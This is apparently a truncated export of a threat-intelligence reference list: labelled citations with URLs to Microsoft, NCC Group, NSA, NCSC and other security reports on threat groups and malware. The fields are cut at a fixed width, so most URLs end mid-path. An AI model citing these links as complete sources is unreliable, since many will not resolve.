Meyers NuMeyers, A. http://www.crowdstrike.com/blog/whois-numbered-panda/
Microsoft MSRC. (202https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
Microsoft -Microsoft 3https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-t
Microsoft Microsoft https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-pro
Microsoft 3Microsoft. https://learn.microsoft.com/en-us/sharepoint/turn-external-sharing-on-or-off
Microsoft Microsoft. https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021
Microsoft Microsoft. https://learn.microsoft.com/en-us/azure/aks/managed-aad
Microsoft Microsoft. https://cloudblogs.microsoft.com/microsoftsecure/2015/06/09/windows-10-to-offer-application-develo
Microsoft Brower, N. https://docs.microsoft.com/windows/threat-protection/windows-defender-exploit-guard/enable-attack
Microsoft Microsoft. https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-r
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/win32/bits/about-bits
Microsoft Microsoft Thttps://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/
Microsoft MSTIC. (202 https://www.microsoft.com/en-us/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-aga
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated
Microsoft MSTIC. (202 https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-th
Microsoft AMicrosoft. https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?v
Microsoft Corio, C., https://docs.microsoft.com/en-us/previous-versions/technet-magazine/cc510322(v=msdn.10)?redirecte
Microsoft Baldwin, M.https://docs.microsoft.com/en-us/azure/security/fundamentals/steps-secure-identity#block-end-user-co
Microsoft AAmlekar, M. https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide
Microsoft AMicrosoft. https://learn.microsoft.com/en-us/security/benchmark/azure/baselines/aad-security-baseline
Microsoft Carr, N., S https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromis
Microsoft Microsoft. https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx
Microsoft Microsoft. https://msdn.microsoft.com/library/aa362813.aspx
Microsoft Microsoft https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp
Microsoft Microsoft. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732
Microsoft Microsoft. https://learn.microsoft.com/en-us/azure/active-directory/conditional-access/concept-conditional-acces
Microsoft Microsoft. https://technet.microsoft.com/en-us/library/dn408187.aspx
Microsoft Brower, N.,https://docs.microsoft.com/windows/device-security/security-policy-settings/create-a-token-object
Microsoft Microsoft. https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createp
Microsoft CLich, B., T https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-how-it-work
Microsoft Microsoft. https://technet.microsoft.com/library/security/4053440
Microsoft DMicrosoft. https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx
Microsoft Microsoft. https://technet.microsoft.com/en-us/library/cc759136(v=ws.10).aspx
Microsoft Microsoft. https://www.microsoft.com/security/blog/2016/07/14/reverse-engineering-dubnium-stage-2-payload-a
Microsoft Microsoft. https://www.microsoft.com/security/blog/2016/06/09/reverse-engineering-dubnium-2/
Microsoft MSTIC, CDO https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activ
Microsoft Microsoft https://devblogs.microsoft.com/premier-developer/control-access-to-power-apps-and-power-automate
Microsoft Microsoft. https://support.microsoft.com/en-us/kb/967715
Microsoft Microsoft. https://technet.microsoft.com/library/cc771387.aspx
Microsoft Microsoft. https://support.office.com/article/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16
Microsoft Microsoft. https://technet.microsoft.com/library/jj865668.aspx
Microsoft Microsoft. https://docs.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/turn-off-visua
Microsoft Windows De https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-ma
Microsoft DMicrosoft. https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-c
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfro
Microsoft DMicrosoft. https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-security?redirectedfrom=M
Microsoft Microsoft. https://docs.microsoft.com/windows/desktop/etw/event-tracing-portal
Microsoft Microsoft Thttps://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RW1aFyW
Microsoft Lich, B., T https://docs.microsoft.com/windows/access-protection/credential-guard/credential-guard-manage
Microsoft EMicrosoft. https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ftp
Microsoft FMicrosoft. https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-contextual-file-
Microsoft Allievi, A. https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-
Microsoft MSTIC. (20https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/
Microsoft Microsoft. https://technet.microsoft.com/library/dd252791.aspx
Microsoft GMicrosoft. https://docs.microsoft.com/en-us/previous-versions/windows/desktop/Policy/filtering-the-scope-of-a-g
Microsoft Microsoft. https://docs.microsoft.com/en-us/powershell/module/exchange/get-inboxrule?view=exchange-ps
Microsoft Vincent Ti https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool:W
Microsoft MSTIC. (20https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
Microsoft Microsoft Thttps://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-atta
Microsoft Microsoft. https://docs.microsoft.com/en-us/iis/configuration/system.webserver/security/isapicgirestriction/
Microsoft IMicrosoft. https://msdn.microsoft.com/library/windows/desktop/ms721766.aspx
Microsoft IMSRC Team. https://msrc-blog.microsoft.com/2021/02/18/microsoft-internal-solorigate-investigation-final-update/
Microsoft MSTIC. (202 https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-ac
Microsoft Manuel, J. http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32%2FKasidet
Microsoft Microsoft. https://technet.microsoft.com/en-us/library/dn408187.aspx
Microsoft Microsoft. https://technet.microsoft.com/library/dn408187.aspx
Microsoft Microsoft. https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prom
Microsoft Microsoft. https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-and-authenticode?view=vs-2022
Microsoft Microsoft Thttps://www.microsoft.com/en-us/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hu
Microsoft Microsoft. http://support.microsoft.com/kb/2962486
Microsoft Microsoft. https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/manage-mail-flow
Microsoft Microsoft Thttps://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-k
Microsoft Microsoft. https://msrc-blog.microsoft.com/2010/08/23/more-information-about-the-dll-preloading-remote-attack
Microsoft MSTIC. (20https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-acros
Microsoft Microsoft. https://support.microsoft.com/en-us/help/556003
Microsoft Microsoft. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012
Microsoft Microsoft. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012
Microsoft Microsoft. https://technet.microsoft.com/library/cc835085.aspx
Microsoft Microsoft. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012
Microsoft Microsoft Thttps://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-pr
Microsoft Windows De https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum
Microsoft Kaplan, D, https://cloudblogs.microsoft.com/microsoftsecure/2017/06/07/platinum-continues-to-evolve-find-ways
Microsoft Microsoft. https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-ta
Microsoft Microsoft. https://learn.microsoft.com/powershell/scripting/learn/remoting/jea/overview?view=powershell-7.3
Microsoft Burt, T. (2 https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/
Microsoft McCormack, https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor%3
Microsoft PowerShellhttps://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/
Microsoft PMicrosoft. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc961961(v=
Microsoft MSTIC. (20https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organ
Microsoft Microsoft. https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections
Microsoft Microsoft. https://learn.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token
Microsoft Microsoft. https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/pr
Microsoft Microsoft. https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6
Microsoft Microsoft. https://learn.microsoft.com/en-us/purview/dlp-learn-about-dlp
Microsoft Microsoft. https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-t
Microsoft Microsoft Thttps://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecos
Microsoft Microsoft. https://technet.microsoft.com/en-us/library/cc732643.aspx
Microsoft Margosis, https://blogs.technet.microsoft.com/secguide/2018/12/10/remote-use-of-local-accounts-laps-changes-e
Microsoft Brower, N.,https://docs.microsoft.com/windows/device-security/security-policy-settings/replace-a-process-level-to
Microsoft RMicrosoft. https://support.microsoft.com/help/303972/how-to-grant-the-replicating-directory-changes-permission
Microsoft Microsoft. https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/azure-ad-pim
Microsoft Microsoft. https://support.microsoft.com/en-us/kb/310105
Microsoft SRussinovichhttps://docs.microsoft.com/en-us/sysinternals/downloads/sdelete
Microsoft SMicrosoft. https://technet.microsoft.com/library/cc794757.aspx
Microsoft SAnthe, C. ehttp://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft
Microsoft SAnthe, C. ehttp://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft
Microsoft Microsoft. https://docs.microsoft.com/en-us/previous-versions/system-center/operations-manager-2005/cc18080
Microsoft MSRC Team. https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/
Microsoft Microsoft https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harv
Microsoft SPlett, C., https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privilege
Microsoft SMicrosoft. https://learn.microsoft.com/en-us/security/benchmark/azure/baselines/aad-security-baseline
Microsoft MSRC. (202https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
Microsoft SMicrosoft Thttps://www.microsoft.com/en-us/security/blog/2022/08/15/disrupting-seaborgiums-ongoing-phishing-
Microsoft SGerend, J. https://docs.microsoft.com/windows-server/administration/windows-commands/sxstrace
Microsoft Microsoft. https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundament
Microsoft Microsoft. https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx
Microsoft Microsoft. https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration
Microsoft Burt, T. (2 https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/
Microsoft TMicrosoft. https://technet.microsoft.com/en-us/library/bb491010.aspx
Microsoft McMichael,https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2
Microsoft Microsoft. https://learn.microsoft.com/en-us/entra/identity/conditional-access/concept-token-protection
Microsoft Pornasdorohttps://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win3
Microsoft Microsoft. https://technet.microsoft.com/library/cc755321.aspx
Microsoft Microsoft Dhttps://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-p
Microsoft UMicrosoft. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012
Microsoft Microsoft Thttps://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastruct
Microsoft Mathers, Bhttps://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-t
Microsoft Coulter, D. https://docs.microsoft.com/windows/security/threat-protection/windows-defender-application-control
Microsoft Microsoft. https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-cre
Microsoft Microsoft. https://blogs.technet.microsoft.com/askds/2008/09/11/fun-with-wmi-filters-in-group-policy/
Microsoft MSTIC. (202 https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organiz
Microsoft Microsoft. https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:W
Microsoft Gorzelany, https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-c
Microsoft Microsoft. https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:W
Microsoft Cap, P., et https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-indu
Microsoft dJordan Geurhttps://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-c
Microsoft Microsoft Thttps://technet.microsoft.com/en-us/library/bb490994.aspx
Microsoft_Microsoft. https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-c
MimiPenguGregal, H. https://github.com/huntergregal/mimipenguin
Minerva LaZargarov, https://minerva-labs.com/blog/new-black-basta-ransomware-hijacks-windows-fax-service/
Moran 201Moran, N.,https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attacker
Moran 201Moran, N.,https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html
Morphisec Gorelik, M.https://blog.morphisec.com/cobalt-gang-2.0
Morphisec Gorelik, M.http://blog.morphisec.com/fin7-attacks-restaurant-industry
Morphisec Gorelik, M http://blog.morphisec.com/security-alert-fin8-is-back
Morphisec Lorber, N. https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader
MoustacheFaou, M. ( https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplo
MuddyWate Villanueva https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-u
Mythc DocThomas, C.https://docs.mythic-c2.net/
NCC GroupSmallridge,https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royald
NCC GroupInman, R. ahttps://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/
NCC GroupJansen, W .https://web.archive.org/web/20230218064220/https://research.nccgroup.com/2021/01/12/abusing-clo
NCC GroupMatthews,https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/
NCC GroupBrown, D., https://research.nccgroup.com/2022/04/28/lapsus-recent-techniques-tactics-and-procedures/
NCC GroupTerefos, A.https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/
NCC GroupPantazopouhttps://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/
NCC GroupAntenucci, https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the
NCCGroup Pantazopouhttps://research.nccgroup.com/2018/11/08/rokrat-analysis/
NCSC APT29 National Cyhttps://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf
NCSC CISA NCSC, CISAhttps://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vp
NCSC CycloNCSC. (2022 https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf
NCSC GCHQNCSC GCHQ. https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf
NCSC Joint The Australhttps://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools
NCSC et al UK Nationalhttps://www.ic3.gov/Media/News/2024/240226.pdf
NCSC-NL CDutch Milithttps://www.ncsc.nl/binaries/ncsc/documenten/publicaties/2024/februari/6/mivd-aivd-advisory-coatha
NGLite TroRobert Fal https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/
NHS DigitaNHS Digita https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary
NHS UK BLNHS Digita https://digital.nhs.uk/cyber-alerts/2020/cc-3603
NIST 800-6Grassi, P., https://pages.nist.gov/800-63-3/sp800-63b.html
NJCCIC UrsNJCCIC. (2 https://www.cyber.nj.gov/threat-landscape/malware/trojans/ursnif
NKAbuse BBill Toula https://www.bleepingcomputer.com/news/security/new-nkabuse-malware-abuses-nkn-blockchain-for-s
NKAbuse SKASPERSKYhttps://securelist.com/unveiling-nkabuse/111512/
NSA APT5 CNational Sehttps://media.defense.gov/2022/Dec/13/2003131586/-1/-1/0/CSA-APT5-CITRIXADC-V1.PDF
NSA MS ApNSA Informa https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-a
NSA NCSC TNSA/NCSC.https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%
(
NSA SandwNational Sehttps://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiti
NSA SpottiNational Sehttps://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitori
NSA and ASNSA and ASD https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-M
NSA/FBI DrNSA/FBI. ( https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALW
NTT SecuriHada, H. ( https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech
Nccgroup EPantazopoul https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/
Nccgroup GPantazopouhttps://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/
NetSPI Cli Ryan Gandrhttps://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love
Netscout SASERT team https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/
Netskope SPalazolo, Ghttps://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbo
Netspi PowSutherlandhttps://www.netspi.com/blog/technical-blog/network-penetration-testing/15-ways-to-bypass-the-powe
Nicolas FalNicolas Fal https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf
Nltest Manss64. (n.d. https://ss64.com/nt/nltest.html
NorthSec 2Rascagneres https://docplayer.net/101655589-Tools-used-by-the-uroburos-actors.html
Novetta Bl Novetta Thrhttps://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/up
Novetta Bl Novetta Thhttps://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads
Novetta Bl Novetta Thrhttps://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Install
Novetta Bl Novetta Thhttps://web.archive.org/web/20220608001455/https://www.operationblockbuster.com/wp-content/up
Novetta Bl Novetta Thhttps://web.archive.org/web/20220425194457/https://operationblockbuster.com/wp-content/uploads
Novetta WiNovetta Thrhttps://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04
Novetta-A Novetta. ( https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11
ORB APT31Cimpanu, Ca https://therecord.media/chinese-hacking-group-apt31-uses-mesh-of-home-routers-to-disguise-attacks
ORB MandiRaggi, Michhttps://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
OSX KeydnMarc-Etienn https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
